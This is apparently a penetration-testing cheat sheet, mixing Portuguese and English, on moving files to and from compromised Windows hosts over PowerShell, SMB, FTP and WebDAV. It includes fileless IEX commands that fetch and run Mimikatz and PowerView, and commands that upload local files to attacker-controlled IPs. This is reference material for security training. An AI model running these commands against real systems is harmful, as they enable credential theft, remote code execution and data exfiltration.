Windows File Transfer Methods

Powershell

Download de um arquivo

(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1')

PowerShell DownloadString - Método sem arquivo

Em vez de baixar um script do PowerShell para o disco, podemos executá-lo diretamente na memória usando o cmdlet Invoke-Expression ou o alias IEX

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')

PowerShell Invoke-WebRequest

Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

Ignorar erros comuns de download no IE

Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX

Outro erro nos downloads do PowerShell está relacionado ao canal seguro SSL/TLS se o certificado não for confiável. Podemos ignorar esse erro com o seguinte comando:

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

SMB Downloads

Create the SMB Server

sudo impacket-smbserver share -smb2support /tmp/smbshare

Copy a File from the SMB Server

copy \\192.168.220.133\share\nc.exe

Crie o servidor SMB com um nome de usuário e senha

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

Monte o servidor SMB com nome de usuário e senha

net use n: \\192.168.220.133\share /user:test test

FTP Downloads

Instalando o módulo Python3 do servidor FTP - pyftpdlib

sudo pip3 install pyftpdlib

Configurando um servidor FTP Python3

sudo python3 -m pyftpdlib --port 21

Transferindo arquivos de um servidor FTP usando o PowerShell

(New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt')

PowerShell Web Uploads

Instalando um WebServer

pip3 install uploadserver

Configurando o Upload

python3 -m uploadserver

Script do PowerShell para carregar um arquivo no servidor de upload do Python

Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

Carregamento da Web do PowerShell Base64

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

Capturamos os dados base64 com o Netcat e usamos o aplicativo base64 com a opção decode para converter a string no arquivo.

nc -lvnp 8000
echo <base64> | base64 -d -w 0 > hosts

SMB Uploads

Instalando módulos Python do WebDav

sudo pip3 install wsgidav cheroot

Usando o módulo Python WebDav

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Conectando-se ao Webdav Share

dir \\192.168.49.128\DavWWWRoot

Carregando arquivos usando SMB

copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\

FTP Uploads

sudo python3 -m pyftpdlib --port 21 --write

Arquivo de upload do PowerShell

(New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

PreviousFile Transfers NextQuestion

Last updated 1 year ago

hashtagPowershell

hashtagSMB Downloads

hashtagFTP Downloads

hashtagPowerShell Web Uploads

hashtagCarregamento da Web do PowerShell Base64

hashtagSMB Uploads

hashtagFTP Uploads

Powershell

SMB Downloads

FTP Downloads

PowerShell Web Uploads

Carregamento da Web do PowerShell Base64

SMB Uploads

FTP Uploads